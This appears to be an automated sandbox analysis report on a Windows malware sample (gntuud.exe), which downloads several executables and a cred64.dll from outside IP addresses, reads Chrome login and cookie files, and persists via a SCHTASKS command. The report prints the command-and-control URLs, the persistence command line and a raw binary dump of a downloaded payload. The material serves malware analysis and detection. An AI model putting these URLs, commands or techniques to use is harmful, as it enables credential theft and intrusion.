@ 0x73e97f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73e94de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1567148 registers.edi: 0 registers.eax: 1567148 registers.ebp: 1567228 registers.edx: 0 registers.ebx: 5898832 registers.esi: 5923448 registers.ecx: 4164369045	1
__exception__ Dec. 7, 2022, 3:46 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x729f1194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x728c2ba1 mscorlib+0x36dd51 @ 0x71bedd51 mscorlib+0x32fea6 @ 0x71bafea6 mscorlib+0x30ab40 @ 0x71b8ab40 0x4fb77a 0x4fb62e 0x4fada9 0x4fa1ce 0x4f7c87 0x4f25a5 0x4f20b6 0x4f05a0 0x4f006c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e1f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73e97f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73e94de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1567148 registers.edi: 0 registers.eax: 1567148 registers.ebp: 1567228 registers.edx: 0 registers.ebx: 5898832 registers.esi: 5923448 registers.ecx: 4164369045	1
__exception__ Dec. 7, 2022, 3:39 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 15 registers.r15: 7 registers.rcx: 260 registers.rsi: 5369934752 registers.r10: 3221225785 registers.rbx: 1244208 registers.rsp: 1244168 registers.r11: 514 registers.r8: 2003566592 registers.r9: 958 registers.rdx: 1244304 registers.r12: 0 registers.rbp: 1244432 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (9 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://62.204.41.6/p9cWxH/index.php?scr=1
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://62.204.41.6/p9cWxH/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://31.41.244.188/lego/5jk29l2fg.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.time4unow.com/wp-content/file.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://31.41.244.188/miha/wish.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://31.41.244.188/new/linda5.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://31.41.244.188/ano/anon.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://byh.ajn322bb.com/files/pe/pb1109.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.6/p9cWxH/Plugins/cred64.dll

Performs some HTTP requests (9 events)

request	POST http://62.204.41.6/p9cWxH/index.php?scr=1
request	POST http://62.204.41.6/p9cWxH/index.php
request	GET http://31.41.244.188/lego/5jk29l2fg.exe
request	GET http://www.time4unow.com/wp-content/file.exe
request	GET http://31.41.244.188/miha/wish.exe
request	GET http://31.41.244.188/new/linda5.exe
request	GET http://31.41.244.188/ano/anon.exe
request	GET http://byh.ajn322bb.com/files/pe/pb1109.exe
request	GET http://62.204.41.6/p9cWxH/Plugins/cred64.dll

Sends data using the HTTP POST Method (2 events)

request	POST http://62.204.41.6/p9cWxH/index.php?scr=1
request	POST http://62.204.41.6/p9cWxH/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 176 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2348 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00daf000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2348 region_size: 221184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00330000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c60000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00488000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a0f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00721000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00726000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00489000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

gntuud.exe tried to sleep 180 seconds, actually delayed analysis time by 180 seconds

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe
file	C:\Users\test22\AppData\Local\Temp\1000050001\pb1109.exe
file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe
file	C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe
file	C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe

Creates a suspicious process (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F

Drops a binary and executes it (5 events)

file	C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe
file	C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe
file	C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe
file	C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe
file	C:\Users\test22\AppData\Local\Temp\1000050001\pb1109.exe

Drops an executable to the user AppData folder (6 events)

file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe
file	C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe
file	C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe
file	C:\Users\test22\AppData\Local\Temp\xPsIe.42
file	C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe

A process created a hidden window (8 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Dec. 7, 2022, 3:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe	1	1
ShellExecuteExW Dec. 7, 2022, 3:45 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Dec. 7, 2022, 3:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe	1	1
ShellExecuteExW Dec. 7, 2022, 3:45 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe	1	1
ShellExecuteExW Dec. 7, 2022, 3:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe	1	1
ShellExecuteExW Dec. 7, 2022, 3:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe	1	1
ShellExecuteExW Dec. 7, 2022, 3:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000050001\pb1109.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000050001\pb1109.exe	1	1
ShellExecuteExW Dec. 7, 2022, 3:46 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main filepath: rundll32.exe	1	1

An executable file was downloaded by the process gntuud.exe (6 events)

Time & API	Arguments	Status	Return
InternetReadFile Dec. 7, 2022, 3:45 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $SÂQ2¬]Q2¬]Q2¬]EY¯\_2¬]EY©\û2¬]EY¨\G2¬]EY\R2¬]Q2]Ò2¬]1H¨\@2¬]1H¯\D2¬]1H©\2¬]5H¥\P2¬]5H®\P2¬]RichQ2¬]PELíÈcà `Mp@@¼(0¬JÀOTO@p.textR^` `.rdataYpZd@@.data¨]ÐD¾@À.reloc¬J0L@B¹¸Lè°OhämGèm@YÃjjhØL¹Lè!ZhîmGèN@YÃVWjè¯,Y¿ØLðÏèoZjVÏÇØL¤zGèahømGè@Y_^Ã¹Lé:[¹Lè7OhnGèô?YÃhnGèè?YÃhnGèÜ?YÃ¹yLé\|v¹xLèÿNh nGè¼?YÃjjhÐL¹Lè^uhnGè?YÃVWjèþ+Y¿ÐLðÏè¬uÏÇÐL\|GÆLÆLè7z¡(L ,L%Lh4nG5L£L Lè7?Y_^Ã¹(LèbNhHnGè?YÃh>nGè?YÃUìE]ÃÌÌÌÌÌÌÌÌUìì¡(ÐH3ÅEüMðEðÇsG3ÉUðÂ JEEôÆEøMðÁQUôRèNÄEðMü3Íè8å]ÂÌÌÌÌÌÌÌUìQMüEüÇsG3ÉUüÂ JEüMHEüå]ÂÌUìQMüEüÇsG3ÉUüÂ JEüÀPMÁQèMÄEüå]ÂÌÌÌÌUìQMüEüÇsGMüÁQè»MÄå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUììMüEüxtMüQUøëÇEøpMHEøå]ÃÌÌÌÌÌUìQMüMüèÿÿÿEàtjMüQèT7ÄEüå]ÂÌÌUìQMüjEPMüèëþÿÿMüÇsGEüå]ÂÌÌÌÌÌÌÌÌÌUìQMüMüè!EàtjMüQèô6ÄEüå]ÂÌÌUìQMüMüèÿÿÿå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMühMHMüèlÿÿÿEüÇsGEüå]ÃÌÌÌÌÌÌÌÌÌÌÌÌUìQMüMüè!EàtjMüQèt6ÄEüå]ÂÌÌUìQMüMüèqÿÿÿå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUììMôèrÿÿÿh¼HEôPèÆ[å]ÃUìQMüEPMüèMüÇsGEüå]ÂÌÌÌÌÌÌÌÌÌÌÌUìQMüEPMüèÍýÿÿMüÇsGEüå]ÂÌÌÌÌÌÌÌÌÌÌÌUì¸ÿÿÿ]ÃÌÌÌÌÌÌUìEPèz5Ä]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUììEÁ#U EMôºkÂÿMôUøÇEðE+MøMü}ür}ü#wë è$3Òu÷3ÀuåMUøå]ÃÌÌÌÌÌÌÌÌÌÌÌUìQMüå]ÃÌÌÌÌÌUìQMüå]ÂÌÌÌUìQMüå]ÂÌÌÌUìQMüEüå]ÂUìQMüå]ÃÌÌÌÌÌUìhMHèWR]ÃÌUìQMüMèÑPMüèüÿÿEüÇ¨sGEüå]ÂÌÌÌÌÌÌUìQMüMüè!EàtjMüQèt4ÄEüå]ÂÌÌUìQMüMüèüÿÿå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMüEPMüèüÿÿMüÇ¨sGEüå]ÂÌÌÌÌÌÌÌÌÌÌÌUììMøEøMP;Qu 